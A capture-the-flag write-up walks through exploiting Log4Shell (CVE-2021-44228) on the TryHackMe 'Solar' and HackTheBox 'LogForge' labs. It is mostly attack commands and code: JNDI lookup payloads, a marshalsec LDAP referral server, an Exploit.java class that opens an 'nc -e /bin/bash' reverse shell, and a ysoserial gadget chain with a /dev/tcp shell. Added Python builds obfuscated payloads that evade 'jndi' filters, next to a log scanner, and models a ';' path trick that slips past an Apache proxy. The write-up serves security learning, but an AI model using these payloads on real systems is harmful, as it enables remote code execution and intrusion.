Exploiting Log4Shell (CVE-2021-44228): Solar (THM) and LogForge (HTB)

THM - Solar


TASK 2 (Reconnaissance)

nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out

TASK 3 (Discovery)

Opening the web server in a browser gives away the software running and its exact version (the Apache Solr admin dashboard in this room), which is enough to match it against CVE-2021-44228.

TASK 4 and 5 (POC, Exploitation)

The log file shows requests to /admin/cores with their query parameters written to the log verbatim. Sending the Log4Shell proof-of-concept lookup string as a parameter on that path, while listening with nc on the port named in the payload, produces a connection back from the target, which confirms that Log4j is evaluating the JNDI lookup. Both the ldap:// and rmi:// forms trigger the callback:

nc -lnvp 9999
curl '${jndi:ldap://}'
curl '${jndi:rmi://}'
update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_311/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_311/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_311/bin/javaws" 1
update-alternatives --set java /usr/lib/jvm/jdk1.8.0_311/bin/java
update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_311/bin/javac
update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_311/bin/javaws
java -version
apt install maven
mvn clean package -DskipTests
# This compiles marshalsec (https://github.com/mbechler/marshalsec); its LDAPRefServer answers the JNDI lookup with a reference to the attacker-hosted class
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""
// Exploit.java: the static initializer runs as soon as the target JVM loads the class,
// so the reverse shell fires without the caller ever instantiating it.
public class Exploit {
    static {
        try {
            // connect back to the nc listener on port 9999
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

// compile for Java 8 so the (older) target JVM can load the class file
javac -source 8 -target 8 Exploit.java
curl '${jndi:ldap://}'
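The lookup string is what the whole attack hinges on, so here is an added example (my code, not from the room or the original post) that builds the probe request for the Solr cores endpoint, shows the nested-lookup obfuscation that Log4j itself resolves before the JNDI lookup runs, and runs the matching detection logic over constructed Solr request-log lines. The parameter name `foo`, the `TARGET` placeholder, the attacker address 10.10.14.2 and the sample log lines are assumptions, not values taken from this page.

```python
import re
from urllib.parse import urlencode

# Innermost ${...} lookup: a body that contains no further '$', '{' or '}'.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")


def jndi_payload(scheme: str, host: str, port: int, path: str = "a") -> str:
    """Plain Log4j lookup string that makes the logger resolve a JNDI reference."""
    return f"${{jndi:{scheme}://{host}:{port}/{path}}}"


def obfuscate(payload: str) -> str:
    """Hide the literal 'jndi' token behind nested lookups that Log4j resolves first.

    ${lower:J} evaluates to 'j' and ${::-n} (undefined variable, default 'n') evaluates
    to 'n', so inside the target the string still becomes ${jndi:...} while a naive
    substring filter for 'jndi' never sees it.
    """
    return payload.replace("${jndi:", "${${lower:J}${::-n}di:", 1)


def probe_url(base: str, payload: str, param: str = "foo") -> str:
    """GET request for the Solr cores endpoint (assumed parameter name 'foo')."""
    return f"{base}/solr/admin/cores?{urlencode({param: payload})}"


def _resolve_one(m: "re.Match[str]") -> str:
    body = m.group(1)
    key, sep, default = body.partition(":-")
    if key.lower().startswith("jndi:"):
        return m.group(0)            # keep the dangerous lookup so the caller can see it
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if sep:                          # undefined variable with a default: ${::-n}, ${env:NOPE:-n}
        return default
    return m.group(0)                # anything else stays as literal text


def resolve(s: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups inside-out, the order Log4j's substitutor uses."""
    for _ in range(max_rounds):
        out = LOOKUP_RE.sub(_resolve_one, s)
        if out == s:
            return out
        s = out
    return s


def is_jndi_lookup(text: str) -> bool:
    """True when the text, once nested lookups are collapsed, carries a ${jndi:...} lookup."""
    return re.search(r"\$\{\s*jndi:", resolve(text), re.IGNORECASE) is not None


# Constructed Solr request-log lines (not real captures) in the HttpSolrCall format.
SAMPLE_LOG = [
    "INFO  (qtp1-12) o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://10.10.14.2:1389/a}}",
    "INFO  (qtp1-13) o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${lower:J}${::-n}di:ldap://10.10.14.2:1389/a}}",
    "INFO  (qtp1-14) o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${upper:j}NDI:rmi://10.10.14.2:1099/a}}",
    "INFO  (qtp1-15) o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=healthcheck}",
]


def scan(lines):
    """Return (index, collapsed_line) for every log line that carries a jndi lookup."""
    return [(i, resolve(line)) for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    plain = jndi_payload("ldap", "10.10.14.2", 1389)      # attacker address is a placeholder
    print(probe_url("http://TARGET:8983", plain))
    print(probe_url("http://TARGET:8983", obfuscate(plain)))
    for idx, line in scan(SAMPLE_LOG):
        print(f"line {idx}: {line}")
```

The `resolve` helper models only the `lower`, `upper` and `:-` default forms; real Log4j also resolves `env`, `sys`, `date` and others, so any filter that matches on the raw string rather than the collapsed one is bypassable, which is the same property that makes `obfuscate` useful on the attacking side.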

HTB - LogForge

Apache reverse proxy bypass: the Apache front end denies requests whose path starts with /manager, but Tomcat strips ';' path parameters from each URI segment before mapping the request, so ;/manager/html/expire?path=/ (requested as /;/manager/html/expire?path=/) gets past Apache and still reaches the manager app's session-expiry endpoint, whose logging is where the JNDI lookup is evaluated. Because the target JVM will not load a remote class from the LDAP reference, the payload is a serialized CommonsCollections5 gadget chain from ysoserial, served by the JNDI injection tool (-L is the listener address, -P the serialized payload file):
java -jar ysoserial-modified.jar CommonsCollections5 bash 'sh -i >& /dev/tcp/ 0>&1' > /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L -P /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-
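To make the `;` trick concrete, the following added example (mine, not code from the box or the post) models how an Apache `<Location /manager>` deny rule sees the raw request path while Tomcat strips `;`-delimited path parameters from every segment before mapping the URI to a webapp. The deny prefix and the simplified matching rules are assumptions about the box's configuration, not text from this page.

```python
import re


def apache_location_matches(request_target: str, location_prefix: str) -> bool:
    """Model of an Apache <Location /prefix> block: a plain prefix match on the
    path exactly as the client sent it, with ';' treated as ordinary text."""
    path = request_target.split("?", 1)[0]
    prefix = location_prefix.rstrip("/")
    return path == prefix or path.startswith(prefix + "/")


def apache_locationmatch_blocks(request_target: str, pattern: str) -> bool:
    """Model of <LocationMatch pattern>: a regex search over the same raw path.
    A pattern such as '/manager' (unanchored) also catches '/;/manager/html'."""
    return re.search(pattern, request_target.split("?", 1)[0]) is not None


def tomcat_normalize(request_target: str) -> str:
    """Model of Tomcat's URI mapping: drop ';name=value' path parameters from each
    segment (as Tomcat does for jsessionid), drop empty and '.' segments, and
    resolve '..'. The result is the path Tomcat maps to a context and servlet."""
    path = request_target.split("?", 1)[0]
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]   # '/;/' becomes an empty segment and disappears
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def reaches_manager(request_target: str, deny_prefix: str = "/manager") -> bool:
    """True when Apache's prefix rule lets the request through and Tomcat still
    maps it under deny_prefix: the reverse proxy bypass."""
    if apache_location_matches(request_target, deny_prefix):
        return False
    return tomcat_normalize(request_target).startswith(deny_prefix)


if __name__ == "__main__":
    for target in ["/manager/html", "/;/manager/html", "/;/manager/html/expire?path=/"]:
        print(f"{target:32} apache_blocks={apache_location_matches(target, '/manager')!s:5} "
              f"tomcat_sees={tomcat_normalize(target):22} reaches_manager={reaches_manager(target)}")
```

The mismatch is the whole bug: the proxy and the backend disagree on what the path is. Filtering in front of Tomcat with a regex (`apache_locationmatch_blocks`) narrows it, but the robust fix is to remove or lock down the manager app in Tomcat itself rather than rely on the proxy's view of the URI.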





Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/